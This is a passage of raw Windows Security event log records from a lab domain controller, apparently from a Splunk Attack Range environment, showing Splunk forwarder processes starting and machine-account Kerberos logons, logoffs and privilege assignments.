Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:57:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264222
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1914
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:57:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264224
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x53c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:57:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264223
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xaa0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:57:19 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264227
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7D6FFA
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:57:19 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264226
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x7D6FFA
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 62421
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:57:19 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264225
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7D6FFA
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:57:20 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264230
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7D7066
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:57:20 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264229
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x7D7066
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 62422
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:57:20 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264228
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7D7066
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:57:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264233
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7D7D57
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:57:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264232
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x7D7D57
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 62431
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:57:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264231
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7D7D57
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:58:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264235
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1098
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:58:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264234
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1a64
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:58:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264236
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1b90
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:58:10 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264237
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xa24
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:58:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264238
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1a84
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:58:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264240
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x808
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:58:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264239
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xcc4
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:58:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264243
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7DB788
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:58:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264242
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x7DB788
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 62444
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:58:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264241
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7DB788
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:59:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264254
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7DBC3D
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:59:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264253
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7DBD2B
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:59:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264252
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7DBD73
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:59:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264251
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Delegation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x7DBDE5
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {271648EC-6A60-17D5-CF0E-2D75C946746E}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 62449
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
